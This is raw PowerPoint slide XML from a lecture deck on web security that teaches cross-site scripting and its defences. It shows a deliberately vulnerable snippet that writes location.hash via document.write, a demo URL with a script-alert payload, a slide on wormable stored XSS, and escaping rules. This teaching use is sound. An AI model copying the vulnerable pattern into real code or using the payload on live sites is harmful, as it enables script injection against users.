              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("hello " + name);</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endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6421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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://example.com/test.html#adam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("hello " + name);</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endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6019800" y="2032000"/>
            <a:ext cx="386644" cy="1848556"/>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414889" y="4007556"/>
            <a:ext cx="493889" cy="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124200" y="4162778"/>
            <a:ext cx="3635022" cy="225778"/>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29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Modern Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept-Encoding: deflate, gzip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="Screen Shot 2014-10-08 at 7.10.3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28886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152326014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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>test.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#&lt;script&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>")&lt;/script&gt;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a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("hello " + name);</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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3259667" y="2469444"/>
            <a:ext cx="2760133" cy="1411112"/>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414890" y="4007556"/>
            <a:ext cx="493888" cy="0"/>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24200" y="4162778"/>
            <a:ext cx="3635022" cy="225778"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">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7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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Screen Shot 2014-10-08 at 7.12.1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b="25460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164516541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Wormable XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS vulnerability on user-accessible action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-propagating worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social networks particularly susceptible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is my hero” (2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tweetdeck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2014)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14431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600" y="0"/>
            <a:ext cx="6892419" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6283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0700" y="0"/>
            <a:ext cx="5547732" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9508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2100" y="0"/>
            <a:ext cx="6009515" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169875763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to XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS is very difficult to prevent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every piece of data that is returned to the user and that can be influenced by the inputs to the application must first be sanitized (GET parameters, POST parameters, Cookies, request headers, database contents, file contents)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specific languages (e.g., PHP) often provide routines to prevent the introduction of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitization has to be performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>differently depending on where the data is used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This context-sensitivity of sanitization has been studied by the research community</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287</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22446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to XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule 0: Never Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directly in a script: &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside an HTML comment: &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In an attribute name: &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a tag name: &lt;...NEVER PUT UNTRUSTED DATA HERE... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="/test" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule 1: HTML Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Data into HTML Element Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;body&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;div&gt;...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The characters that affect XML parsing (&amp;, &gt;, &lt;, “, ‘, /) need to be escaped</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288</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16485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Solutions to XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rule 2: Attribute Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Data into HTML Common Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside unquoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be "broken" using many characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside single-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be broken only using the single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside double-quoted attribute: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."&gt;content&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attributes can be broken only using the double quote</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289</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79423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Responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>An HTTP response consists of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>protocol version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>status code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>short reason</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4153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Solutions to XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
